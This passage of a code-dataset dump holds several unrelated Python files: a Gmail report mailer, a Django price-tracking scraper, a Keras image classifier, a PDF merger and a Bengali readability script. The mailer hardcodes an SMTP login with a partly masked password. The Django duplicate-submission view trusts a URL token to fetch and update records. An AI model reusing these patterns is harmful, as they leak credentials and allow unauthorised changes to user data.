1、使用单因子:signal表示交易信号,strategy表示策略持仓信号\n bench_trade_signal, bench_strategy_signal, bench_trade_test, bench_strategy_test = self.AllStrategy(bench_type='bench')\n ind_trade_signal, ind_strategy_signal, ind_trade_test, ind_strategy_test = self.AllStrategy(bench_type='SW1')\n\n","repo_name":"gftaoxin/StrategyPythonCode","sub_path":"AMatketTiming/TradeSignal/Signal1_BigAmt.py","file_name":"Signal1_BigAmt.py","file_ext":"py","file_size_in_byte":9257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"44363355746","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 4 15:12:02 2019\r\n\r\n@author: willi\r\n\"\"\"\r\n\r\ndef send_email(week_num, report_name):\r\n import email\r\n import email.mime.application\r\n from email.mime.multipart import MIMEMultipart\r\n from email.mime.text import MIMEText\r\n from email.mime.image import MIMEImage\r\n import smtplib\r\n import csv\r\n \r\n # Create a text/plain message\r\n group = []\r\n msg = email.mime.multipart.MIMEMultipart()\r\n msg['Subject'] = 'Weekly Report'\r\n msg['From'] = 'trendspptx@gmail.com'\r\n \r\n answer = input('Use emails from file? (y/n): ')\r\n if answer.lower() == 'y':\r\n answer = input('Use default list? (y/n): ')\r\n if answer.lower() == 'y':\r\n with open('email_list.csv', 'r') as f:\r\n for line in csv.reader(f):\r\n group.append(line[0])\r\n else:\r\n answer = input(\"Enter file name '.csv',\\ne.g. email_list.csv: \")\r\n with open(answer, 'r') as f:\r\n for line in csv.reader(f):\r\n group.append(line[0]) \r\n else:\r\n to = input('Enter email to send to,\\ne.g. 
trendspptx@gmail.com: ')\r\n print(\"When finished type 'done': \")\r\n \r\n while to.lower() != 'done':\r\n group.append(to)\r\n to = input('Please enter next email: ')\r\n\r\n print('\\nSending emails to:\\n', group)\r\n \r\n msg['To'] = ','.join(group)\r\n \r\n # The main body is just another attachment\r\n body = email.mime.text.MIMEText(\"Report for Week \" + str(week_num))\r\n msg.attach(body)\r\n \r\n # Input the file location, including the file name and type\r\n fp = open(report_name,'rb')\r\n \r\n # edit subtype to replicate the document type\r\n att = email.mime.application.MIMEApplication(fp.read(),_subtype=\"pptx\")\r\n fp.close()\r\n att.add_header('Content-Disposition','attachment',filename=report_name)\r\n msg.attach(att)\r\n \r\n s = smtplib.SMTP(\"smtp.gmail.com\", 587, timeout=120)\r\n s.starttls()\r\n \r\n # Your login information\r\n s.login('trendspptx','M******5')\r\n \r\n # Email information (from address, [recipient email addresses])\r\n s.sendmail('trendspptx@gmail.com',group, msg.as_string())\r\n s.quit()","repo_name":"wsum92/pptx","sub_path":"email_report.py","file_name":"email_report.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"8862831257","text":"from collections import OrderedDict\nfrom urllib.parse import urlencode\nfrom django.http import HttpResponseForbidden\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse, reverse_lazy\nfrom django.http import Http404\nfrom .forms import ContactForm, ProductUpdateForm, UserForm\nfrom .models import Product, User, PriceHistory, ProductToUser\nfrom bs4 import BeautifulSoup\nimport requests\nimport shutil\nimport secrets\nimport os\nfrom django.views.generic.base import TemplateView\nfrom django.views.generic import DetailView\nfrom django.views import View\nfrom django.views.generic.edit import DeleteView, FormMixin\nfrom django.core.mail import send_mail\nfrom bokeh.embed import components\nfrom bokeh.models import Range1d, DatetimeTickFormatter, NumeralTickFormatter\nfrom bokeh.plotting import figure\nimport pandas as pd\n\n\n# Create your views here.\n\n# Dict stores HTML and CSS info extracted from product URLs so the correct tags can be found when scraping.\nbrand_specs = {'Frankie_Shop':\n {'price': (\"strong\", {\"class\": \"prd-DetailPrice_Price\"}),\n 'image': (\"div\", {\"class\": \"prd-Detail_Image\"})\n },\n 'Ganni':\n {'price': (\"span\", {\"class\": \"product-price__normal\"}),\n 'image': (\"div\", {\"class\": \"b-product-images__large\"}),\n },\n 'Reformation':\n {\n 'price': (\"span\", {\"class\": \"price--reduced\"}),\n 'image': (\"div\", {\"class\": \"pdp__images-main-container\"})\n }\n }\n\n\nclass IndexView(View):\n # func will be called when post request is received\n def post(self, request):\n # instanciate the user form and retrieve contents from post request\n user_form = UserForm(request.POST)\n my_url = \"\"\n\n # validate form\n if user_form.is_valid():\n # clean data received from post request\n user_data = user_form.cleaned_data\n\n # scrape url provided by user to fetch name, brand, and image\n user_url = user_data['product_url']\n soup = self.scrape_from_url(user_url)\n product_name, product_brand = self.fetch_name_brand(user_url, soup)\n out_src, new_img = self.fetch_image(product_brand, soup)\n\n # get or create object from Product db with scrapped values for name, brand and img\n user_product = Product.objects.get_or_create(\n 
product_url=user_url,\n name=product_name,\n brand=product_brand,\n img_out_src=out_src,\n img=new_img)\n\n # get or create object from User db with post request value for email\n user = User.objects.get_or_create(\n user_email=user_data['user_email'])\n\n # fetch current price and save as a new entry on PriceHistory db\n first_price = self.fetch_price(user_product[0], soup)\n product_price = PriceHistory(\n linked_product=user_product[0], price=first_price)\n product_price.save()\n\n # fecth product to user entry from db based on user and linked_product\n product_to_user = ProductToUser.objects.filter(\n user_id=user[0], linked_product=user_product[0]).first()\n\n # if no result is returned, create an entry on db\n if not product_to_user:\n new_prod_user = ProductToUser(\n user_id=user[0], linked_product=user_product[0], desired_price=user_data[\"desired_price\"], auth_token=self.auth_token())\n new_prod_user.save()\n\n # redirect to thank-you URL\n base_url = reverse('submit-successful') # 1 thank-you/\n # 2 auth=bhejwbhr374637hfd\n query_string = urlencode({'auth': new_prod_user.auth_token})\n # 3 /thank-you/?auth=bhejwbhr374637hfd\n my_url = '{}?{}'.format(base_url, query_string)\n\n # sends email to user confirming submition success.\n send_mail(\n 'Price Monitor - you started monitoring a new product',\n f'Hey! \\nYou\\'re now monitoring prices for {user_product[0].name.title()}.\\nHere is your product\\'s link: http://127.0.0.1:8000/auth={new_prod_user.auth_token}',\n 'fashionpricetracker@gmail.com',\n [user[0].user_email],\n fail_silently=False,)\n\n else:\n # check if value inputed by user as desired_price matches the one currently stored on db.\n # if it doesn't match change value of price_alt to True\n if user_data[\"desired_price\"] != product_to_user.desired_price:\n product_to_user.price_alt = \"True\"\n else:\n product_to_user.price_alt = \"False\"\n\n product_to_user.save()\n\n # redirect to submit repeat URL\n base_url = reverse('duplicate') # 1 duplicate/\n # 2 auth=bhejwbhr374637hfd\n query_string = urlencode(\n {'auth': product_to_user.auth_token, 'new-price': user_data[\"desired_price\"]})\n # 3 /duplicate/?auth=bhejwbhr374637hfd&new-pre=120\n my_url = '{}?{}'.format(base_url, query_string)\n\n return redirect(my_url)\n\n # when page receives a GET request, it renders the class based user/product form and the index hmtl, passing the form as context.\n def get(self, request):\n user_form = UserForm(request.GET)\n return render(request, \"checker/index.html\", {'form': user_form})\n\n def scrape_from_url(self, product_url):\n # headers included to prevent page from block the script when scraping.\n headers = {'user-agent':\n 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36'}\n\n # get HTML document from URL usign requests lib and passing headers as arg\n r = requests.get(url=product_url, headers=headers)\n\n # parse content through beautifulsoup parser.\n soup = BeautifulSoup(r.content, \"html.parser\")\n\n return soup\n\n def fetch_name_brand(self, product_url, soup):\n # check which brand name is in URL to define brand name:\n if \"ganni\" in product_url:\n brand = \"Ganni\"\n\n elif \"thefrankieshop\" in product_url:\n brand = \"Frankie_Shop\"\n\n elif \"byparra\" in product_url:\n brand = \"ByParra\"\n\n elif \"thereformation\" in product_url:\n brand = \"Reformation\"\n\n # get product's name by finding the first H1 HTML tag in soup objects.\n name = soup.find_all(\"h1\")[0].text\n\n return (name, brand)\n\n 
def fetch_image(self, brand, soup):\n\n # get image class from dict\n image_arg_one = (brand_specs[brand]['image'])[0]\n image_arg_two = (brand_specs[brand]['image'][1]['class'])\n\n # find elements with the correct class name\n div_tag = soup.select(f\"{image_arg_one}.{image_arg_two}\")\n\n # from the list of divs, get only the img tags.\n images = div_tag[0].find('img')\n\n if brand == 'Reformation':\n # src attribute for Reformation brand is declared as data-src instead of src in HTML.\n img_src = images['data-src']\n else:\n # from the img tag, get only the src attribute.\n img_src = images['src']\n\n # configure source path in proper http:// or https:// format.\n img_src_link = \"http://\"\n\n if img_src.startswith(\"https://\") or img_src.startswith(\"http://\"):\n img_src_link = img_src\n\n elif img_src.startswith(\"//\"):\n after_http = img_src.lstrip(\"//\")\n img_src_link += after_http\n\n else:\n img_src_link += img_src\n\n # configure name of image file to be saved\n file_name = img_src_link.split(\"/\")[-1].split(\".\")[0] + \".jpg\"\n\n # configure path of image file to be saved\n file_path = os.path.join(\n \"checker/static/checker/images/product_images/\", file_name)\n\n # Open the url image, set stream to True, this will return the stream content.\n r = requests.get(img_src_link, stream=True)\n\n # Check if the image was retrieved successfully\n if r.status_code == 200:\n # Set decode_content value to True, otherwise the downloaded image file's size will be zero.\n r.raw.decode_content = True\n\n # Open a local file with wb ( write binary ) permission.\n with open(file_path, 'wb') as file:\n shutil.copyfileobj(r.raw, file)\n\n # full path\n file_path = \"checker/images/product_images/\" + file_name\n\n return (img_src, file_path)\n\n def fetch_price(self, product, soup):\n\n # get brand attribure from product object\n brand = product.brand\n \n # get correct tag and class name\n price_arg_one = (brand_specs[brand]['price'])[0]\n price_arg_two = (brand_specs[brand]['price'][1]['class'])\n\n # find specific tag in parsed content and get the text element out of it.\n price = soup.find_all(price_arg_one, price_arg_two)[0].text\n\n # casting price value as and int and removing any extra characters\n int_price = int(''.join(v for v in price if v.isdigit()))\n\n return int_price\n\n # generate token for user to product relation identification\n def auth_token(self):\n user_token = secrets.token_urlsafe(16)\n return user_token\n\n# Renders submit_success HTML, gets auth token passed through URL and passed that as context to HTML.\n\n\nclass ThanksView(View):\n def get(self, request):\n product_auth = request.GET.get('auth')\n return render(request, \"checker/submit_success.html\", {'product_auth': product_auth})\n\n\nclass RepeatedSubmission(View):\n # get ProducttoUser object that matches the pk passed through URL\n def get_object(self):\n return ProductToUser.objects.get(pk=self.request.GET.get('auth'))\n\n # get product title from Product object attribute\n def get_title(self):\n return self.get_object().linked_product.name.title()\n\n # when page receives a GET request, it renders the submit_duplicate hmtl, passing the the ProductToUser object and the product title as context.\n def get(self, request):\n return render(request, \"checker/submit_duplicate.html\", {'product': self.get_object(), 'title': self.get_title()})\n\n # when POST request is received from form (meaning user submitted a new price),\n # it replaces the object's desired_price attribute value with the new 
price submitted.\n # also renderes the submit_change_successful.html with the ProducttoUSer object as context.\n def post(self, request):\n object = self.get_object()\n object.desired_price = self.request.GET.get('new-price')\n object.save()\n return render(request, \"checker/submit_change_successful.html\", {'product': object})\n\n# View for product page, it extends Django's generic DetailView as it's ideal to displaying info related to a single object from a Model.\n\n\nclass ProductDetailView(FormMixin, DetailView):\n template_name = \"checker/product_page.html\"\n model = ProductToUser\n form_class = ProductUpdateForm\n\n\n def get_success_url(self):\n return reverse('product-page', kwargs={'pk': self.object.pk})\n\n # adding auth_token, product object, title, price and graph to context to be passed to HTML\n def get_context_data(self, **kwargs):\n context = super(ProductDetailView, self).get_context_data(**kwargs)\n product_id = self.object.linked_product.id\n price_history = PriceHistory.objects.filter(\n linked_product__id=product_id)\n product_auth = self.object.auth_token\n context[\"form\"] = self.get_form()\n context[\"product_auth\"] = product_auth\n context[\"product\"] = self.object.linked_product\n context[\"title\"] = self.object.linked_product.name.title()\n context[\"current_price\"] = self.get_current_price(\n self.get_price_to_date(price_history))\n context[\"script\"], context[\"div\"] = self.generate_graph(\n price_history, context[\"current_price\"], self.object.desired_price)\n return context\n\n # gets last price in DB for specific product and generates a price history graph\n def get_price_to_date(self, price_history):\n price_to_date = OrderedDict()\n\n # loop through all the PriceHistory objects in the price_history list.\n for entry in price_history:\n\n # get object's date attribute\n entry_date = entry.price_date\n\n # get object's price attribute\n entry_price = entry.price\n\n # add date and price to OrderedDict\n price_to_date[entry_date] = entry_price\n\n return price_to_date\n\n def sort_dict_to_lists(self, price_history):\n date_list = []\n price_list = []\n\n # loop through price_to_date key,value pairs to add each date to date_list and price to price_list\n for key, value in price_history.items():\n if key not in date_list:\n date_list.append(key)\n price_list.append(value)\n\n return date_list, price_list\n\n def generate_graph(self, price_history, current_price, desired_price):\n\n price_to_date = self.get_price_to_date(price_history)\n date_list, price_list = self.sort_dict_to_lists(price_to_date)\n print(date_list)\n\n formatted_dates = []\n\n # format datetime objects in list\n for date in date_list:\n formatted_dates.append(pd.to_datetime(date))\n\n # create a new plot with a title and axis labels\n p = figure(title=\"Price History\",\n x_axis_type=\"datetime\", width=500, height=450)\n\n # add multiple renderers - one line and one circle\n if len(date_list) > 1:\n p.line(formatted_dates, price_list, legend_label=\"History\",\n color=\"#0d6efd\", line_width=2)\n else:\n p.circle(formatted_dates[0], price_list[0],\n legend_label=\"History\", color=\"#0d6efd\", size=20)\n\n p.circle(date_list[-1], desired_price,\n legend_label=\"Target Price\", size=20, color=\"#f695d9\")\n\n # set numbers range on y axis (prices)\n p.y_range = Range1d(1, (current_price + 100))\n\n # format y and x axis\n p.yaxis[0].formatter = NumeralTickFormatter(format=\"€0,0\")\n p.xaxis[0].formatter = DatetimeTickFormatter(years=\"%d/%m/%Y\",\n months=\"%d/%m/%Y\",\n 
days=\"%d/%m/%Y\",\n hours=\"%d/%m/%Y\",\n hourmin=\"%d/%m/%Y\",\n minutes=\"%d/%m/%Y\",\n minsec=\"%d/%m/%Y\",\n seconds=\"%d/%m/%Y\",\n milliseconds=\"%d/%m/%Y\",\n microseconds=\"%d/%m/%Y\")\n\n # get script and div boken components so they can be embedded on html\n script, div = components(p)\n\n return script, div\n\n def get_current_price(self, price_history):\n # reverse received list and get the last element\n last_date, last_price = next(reversed(price_history.items()))\n return last_price\n\n # this func will be used when a post request is received from the update price form\n def post(self, request, *args, **kwargs):\n if not request.user.is_authenticated:\n return HttpResponseForbidden()\n\n # from request get object and form\n self.object = self.get_object()\n form = self.get_form()\n\n # validade form\n if form.is_valid():\n\n # change price in db and generate a new graph with new desired price.\n # pass new script and div components of graph as context to html\n new_desired_price = int(request.POST[\"new_price\"])\n self.object.desired_price = new_desired_price\n self.object.price_email_sent = False\n product_id = self.object.linked_product.id\n self.object.save()\n context = self.get_context_data(**kwargs)\n price_history = PriceHistory.objects.filter(\n linked_product__id=product_id)\n current_price = self.get_current_price(\n self.get_price_to_date(price_history))\n context['script'], context['div'] = self.generate_graph(\n price_history, current_price, new_desired_price)\n return render(request, \"checker/product_page.html\", context)\n\n else:\n return self.form_invalid(form)\n\n def form_valid(self, form):\n # Here, we would record the user's interest using the message\n # passed in form.cleaned_data['message']\n return super(ProductDetailView, self).form_valid(form)\n\n# Renders delete-confirm html, deletes the specific instance of Product to User model (object is identified through pk passed through URL to this view)\n# and redirects to success url\n# Product title is passed as context to delete-confirm html.\n\n\nclass DeleteProductView(DeleteView):\n model = ProductToUser\n template_name = \"checker/delete_confirm.html\"\n success_url = reverse_lazy(\"delete-successful\")\n\n # get context data and pass it to html template\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = self.object.linked_product.name.title()\n return context\n\n# Delete success page only requires a html to be rendered.\n\n\nclass DeleteSuccessful(TemplateView):\n template_name = \"checker/delete_success.html\"\n\n\nclass ContactView(View):\n # when page receives a GET request, it renders the class based contact form and the contact hmtl, passing the form as context.\n def get(self, request):\n contact_form = ContactForm(request.GET)\n return render(request, \"checker/contact.html\", {'form': contact_form})\n\n # when POST request is received from form, it stores its info under specific vars\n # and sends email to admin email with user message details.\n def post(self, request):\n user_data = request.POST\n user_name = user_data['user_name']\n user_email = user_data['user_email']\n message_subject = user_data['subject']\n message_content = user_data['message']\n send_mail(\n 'New user message',\n f'Name:{user_name}\\nEmail:{user_email}\\nSubject:{message_subject}\\nMessage:{message_content}',\n 'fashionpricetracker@gmail.com',\n ['fashionpricetracker@gmail.com'],\n fail_silently=False,)\n return redirect('contact-us/success')\n\n# Contact 
success page only requires a html to be rendered.\n\n\nclass ContactSuccessView(TemplateView):\n template_name = \"checker/contact_success.html\"\n","repo_name":"ifmachado/PriceMonitor","sub_path":"checker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73491703626","text":"# -*- coding: utf-8 -*\nfrom django.urls import reverse \nfrom django.http import JsonResponse\nfrom django.template import RequestContext\nfrom product.models import ProductList\nfrom utils.tools import response_err\n\n\ndef inventories(view_func):\n\n\t# check inventories fo the follow product\n\tdef _wrapped_view_func(request, *args, **kwargs):\n\t\t# get inventories from request\n\t\ttry:\n\t\t\t#pid = request.product_id\n\t\t\tpid = kwargs.get('pid') if kwargs.get('pid', -1) > -1 else request.POST['product_id']\n\n\t\t\tprod = ProductList.objects.get(product_id=pid)\n\n\t\t\tamount = kwargs.get('stock_pcs') if kwargs.get('stock_pcs', -1) > -1 else request.POST['stock_pcs']\n\n\t\t\tif int(prod.stock_pcs) < int(amount):\n\t\t\t\treturn JsonResponse(response_err(code=1001))\n\n\t\texcept ProductList.DoesNotExist:\n\t\t\treturn JsonResponse(response_err(code=1000))\n\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\treturn JsonResponse(response_err())\n\n\t\treturn view_func(request, *args, **kwargs)\n\n\treturn _wrapped_view_func\n","repo_name":"tingShean/projectb","sub_path":"decorators/inventories.py","file_name":"inventories.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16742591689","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy.stats import pearsonr\n\nplt.style.use('seaborn')\n# reads data\ndf = pd.read_csv('../../data/sites/asu_house.csv', converters={'Time':pd.to_datetime})\n\n# I drop the very low concentrations (<0.001) as these are way below MDL\n# and just distorts the figure\ndf=df.dropna(subset=['IndoorConcentration'])[df['IndoorConcentration']>0.001]\n\n# the distinction between the on and testing phases of CPM is not that relevant here\ndf['CPM'].replace(['Testing'],['On'],inplace=True)\n\nfig, ax = plt.subplots(dpi=300)\n\nfor case in df['LandDrain'].unique():\n df_now = df[df['LandDrain']==case]\n r = pearsonr(df_now['IndoorOutdoorPressure'], df_now['logAttenuationAvgGroundwater'])\n\n sns.regplot(\n data=df_now,\n x='IndoorOutdoorPressure',\n y='logAttenuationAvgGroundwater',\n ax=ax,\n x_bins=np.linspace(-15,15,30),\n label=case+', r = %1.2f' % r[0],\n )\n\nax.set(\n title='Land drain\\'s effect on VI pressure dependence at the ASU house\\nPearson\\'s r value for each case shown',\n ylabel='$\\\\log_{10}{(\\\\alpha_\\\\mathrm{gw})}$',\n xlabel='$p_\\\\mathrm{in/out} \\; \\\\mathrm{(Pa)}$',\n)\nax.legend(title='Land Drain')\n\nplt.savefig('../../figures/preferential_pathways/asu_pressure_dependence.pdf')\nplt.show()\n","repo_name":"jstr0em/thesis","sub_path":"code/preferential_pathways/asu_pressure_dependence.py","file_name":"asu_pressure_dependence.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2861457484","text":"import PyPDF2\r\nimport sys\r\n\r\ninputs = sys.argv[1:]\r\n\r\n\r\ndef pdf_combiner(pdf_lists):\r\n merger = PyPDF2.PdfFileMerger()\r\n for pdf in pdf_lists:\r\n 
merger.append(pdf)\r\n merger.write(\"super.pdf\")\r\n print(\"all done\")\r\n\r\n\r\npdf_combiner(inputs)\r\n","repo_name":"shahzain88/python","sub_path":"PDF_combiner.py","file_name":"PDF_combiner.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"39561156984","text":"from django.template import RequestContext\nfrom django.shortcuts import render_to_response, get_object_or_404\n\nfrom profiles.models import Profile\n\n\ndef home(request):\n ci = RequestContext(request)\n tmpl = {\n 'profiles': Profile.objects.all()\n }\n return render_to_response('profiles/home.html', tmpl, ci)\n\n\ndef profile(request, id, last_name, first_name):\n ci = RequestContext(request)\n tmpl = {\n 'profile': get_object_or_404(Profile, id=id)\n }\n return render_to_response('profiles/profile.html', tmpl, ci)\n","repo_name":"fallenhitokiri/catntent","sub_path":"profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"34714368878","text":"from keras.models import Sequential\r\nfrom keras.layers import Convolution2D\r\nfrom keras.layers import MaxPooling2D\r\nfrom keras.layers import Flatten\r\nfrom keras.layers import Dense\r\n\r\n#Initializing the Convulatonal Neural Network\r\nclassifier = Sequential()\r\n\r\n#Step-1 Adding a convolutional layer\r\nclassifier.add(Convolution2D(32, 3, 3, input_shape=(64, 64, 3), activation = 'relu'))\r\n\r\n#Step-2 Pooling\r\nclassifier.add(MaxPooling2D(pool_size=(2, 2), ))\r\n\r\n#Adding another Convolutional layer\r\nclassifier.add(Convolution2D(32, 3, 3, activation = 'relu'))\r\nclassifier.add(MaxPooling2D(pool_size=(2, 2), ))\r\n\r\n#Step-3 Flattening\r\nclassifier.add(Flatten())\r\n\r\n#Step-4 Full connection\r\nclassifier.add(Dense(output_dim = 128, activation='relu'))\r\nclassifier.add(Dense(output_dim = 1, activation='sigmoid'))\r\n\r\n#Step-5 Compiling the CNN\r\nclassifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\r\n\r\n#Step-6 Fitting the CNN to the images\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\ntrain_datagen = ImageDataGenerator(\r\n rescale=1./255,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True\r\n)\r\n\r\ntest_datagen = ImageDataGenerator(rescale=1./255)\r\n\r\n#Dataset to train the CNN\r\ntraining_set = train_datagen.flow_from_directory(\r\n 'dataset/training_set',\r\n target_size=(64, 64),\r\n batch_size=32,\r\n class_mode='binary'\r\n)\r\n\r\n\r\n#Dataset to test the CNN\r\ntest_set = test_datagen.flow_from_directory(\r\n 'dataset/test_set',\r\n target_size=(64, 64),\r\n batch_size=32,\r\n class_mode='binary'\r\n)\r\n\r\nclassifier.fit_generator(\r\ntraining_set,\r\nsamples_per_epoch=8000, \r\nnb_epoch=25, \r\nvalidation_data=test_set, \r\nnb_val_samples=2000\r\n)","repo_name":"saanville/CNNDogsAndCatsClassifier","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8630595492","text":"#separate and print the numbers and their position of a given string.\n\n\nimport re\n\ntext = \"The following example creates an ArrayList with a capacity of 50 elements.\\\n Four elements are then added to the ArrayList and the ArrayList is trimmed accordingly.\"\n\n\npattern = \"\\d+\"\n\nfor word in re.finditer(pattern, 
text):\n print(word.group(0))\n print('Index position : ', word.start())\n\n\n'''\n=> re.finditer(pattern, string, flags=0)\n Return an iterator yielding match objects over all non-overlapping matches for the RE pattern in string. \n \n=> \\d\n For Unicode (str) patterns:\n Matches any Unicode decimal digit (that is, any character in Unicode character category [Nd]). \n This includes [0-9], and also many other digit characters. If the ASCII flag is used only [0-9] is matched.\n \n=> Match.group([group1, ...])\n Returns one or more subgroups of the match. \n If there is a single argument, the result is a single string\n if there are multiple arguments, the result is a tuple with one item per argument.\n \n >>> m = re.match(r\"(\\w+) (\\w+)\", \"Isaac Newton, physicist\")\n >>> m.group(0) # The entire match\n 'Isaac Newton'\n >>> m.group(1) # The first parenthesized subgroup.\n 'Isaac'\n >>> m.group(2) # The second parenthesized subgroup.\n 'Newton'\n >>> m.group(1, 2) # Multiple arguments give us a tuple.\n ('Isaac', 'Newton')\n'''\n","repo_name":"md-mostafa/python_RE_practice","sub_path":"29.py","file_name":"29.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6308711226","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport pandas as pd\nimport joblib\nimport math\n\ndef singleDari(s1):\n s2 = re.sub(r'\\n+', '।',s1)\n s3 = re.sub(r'।+\\s*।*', '।',s2)\n return s3\n\ndef singleSpace(ss):\n return re.sub(r'\\s+\\s*',' ',ss)\n\n\ndef sentenceSplit(str1):\n return re.split(r'।|\\?|!',str1)\n\n\n\ndef replaceMultiple(mainString, toBeReplaces, newString): \n\n\n for elem in toBeReplaces:\n if elem in mainString:\n mainString = mainString.replace(elem, newString)\n\n return mainString\n\n\n\ndef preProcessing(s):\n s1 = replaceMultiple(s, [\"…\",\"\\\\\",'{','}','[',']','॥','#','”','“','.',',',';',':','/','\"','–','-','*','(',')','\\'','%','$', '&', '+', '=','<', '>','|','—','_','\\ufeff','\\u200c','’','‘'] ,' ')\n return s1\n\ndef bengali_sentence_tokenizer(text_path):\n file1 = open(text_path,\"r\")\n text = file1.read()\n l = sentenceSplit(singleSpace(preProcessing(singleDari(text))))\n l1 =[]\n for i in range(len(l)):\n if (l[i].isspace()==False and l[i]!=''): \n l1.append(l[i])\n return l1\n\ndef bengali_sentence_tokenizer1(text):\n l = sentenceSplit(singleSpace(preProcessing(singleDari(text))))\n l1 =[]\n for i in range(len(l)):\n if (l[i].isspace()==False and l[i]!=''): \n l1.append(l[i])\n return l1\n\n\n\n\n\ndef removeExtraWhitespaceFromSents(inp):\n sentence_token =[]\n for i in range(len(inp)):\n k =[]\n removed_index =[]\n k = inp[i].split(\" \")\n sentence_token.append(list(filter(str.strip, k)))\n sentence_token_merged =[]\n for i in range(len(sentence_token)):\n sentence_token_merged.append(' '.join(sentence_token[i]))\n return sentence_token_merged\n\npronunciation_dict = pd.read_csv(\"/content/drive/My Drive/Readability_dataset/lexicon.tsv\",sep='\\t',header=None)\n\npronunciation_dict_words=list(pronunciation_dict[0])\n\npronunciation_dict_length_temp = list(pronunciation_dict[1])\n\npronunciation_dict_words_length = []\n\n\n\nfor i in range(len(pronunciation_dict_length_temp)):\n str1 = pronunciation_dict_length_temp[i]\n if '.' 
not in str1:\n pronunciation_dict_words_length.append(1)\n else:\n pronunciation_dict_words_length.append(len(str1.split('.')))\n\ng1 = '/content/drive/My Drive/Readability_dataset/pronunciation_dict_words.pkl'\njoblib.dump(pronunciation_dict_words,g1)\n\ng2 ='/content/drive/My Drive/Readability_dataset/pronunciation_dict_words_length.pkl'\njoblib.dump(pronunciation_dict_words_length,g2)\n\ns1= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class1_1.txt')\n\n\ns5= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class2_1.txt')\n\n\ns9= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class3_1.txt')\n\ns13= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class4_1.txt')\n\n\ns17= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class5_1.txt')\n\n\ns21= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class6_1.txt')\n\n\ns25= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class7_1.txt')\n\n\ns29= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class8_1.txt')\n\n\n\ns33= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class9+10_1.txt')\n\n\ns37= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/class11+12_1.txt')\n\n\n\ns41= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/shishutosh1.txt')\ns42= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/shishutosh2.txt')\n\n\n\ns46= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/prapto1.txt')\ns47= bengali_sentence_tokenizer('/content/drive/My Drive/Readability_dataset/ARI/prapto2.txt')\n\nall_sents =s1+s5+s9+s13+s17+s21+s25+s29+s33+s37+s41+s42+s46+s47\n\nall_sents1 = removeExtraWhitespaceFromSents(all_sents)\n\nwords =[]\n\n\nfor i in range(len(all_sents1)):\n s = all_sents1[i].split()\n for i1 in range(len(s)):\n words.append(s[i1])\n\nunique_words = list(set(words))\n\nvocab_not_in_dict =[]\n\nfor i in range(len(unique_words)):\n if unique_words[i] not in pronunciation_dict_words:\n #count2 = count2 + 1\n vocab_not_in_dict.append( unique_words[i])\n\nf=open(\"/content/drive/My Drive/Readability_dataset/vocab_not_in_dict.txt\",\"w+\")\n\nfor i in range(len(vocab_not_in_dict)):\n f.write(vocab_not_in_dict[i]+\",\"+\"\\n\")\n\noov1 = pd.read_csv(\"/content/drive/My Drive/Readability_dataset/vocab_not_in_dict.csv\",header=None)\n\nall_words =pronunciation_dict_words + list(oov1[0])\n\nall_words_syllable_count = pronunciation_dict_words_length + list(oov1[1])\n\n\"\"\"**Flesch–Kincaid readability tests**\n[https://en.wikipedia.org/wiki/Flesch%E2%80%93Kincaid_readability_tests](https://en.wikipedia.org/wiki/Flesch%E2%80%93Kincaid_readability_tests)\n\"\"\"\n\ndef flesch_kincaid(text_path):\n file1 = open(text_path,\"r\")\n text = file1.read()\n if len(text.strip()) != 0: \n s1= bengali_sentence_tokenizer1(text) \n sentence_token =[]\n for i in range(len(s1)):\n k =[]\n k = s1[i].split(\" \")\n sentence_token.append(list(filter(str.strip, k)))\n\n input_length_list = []\n for i in range(len(sentence_token)):\n 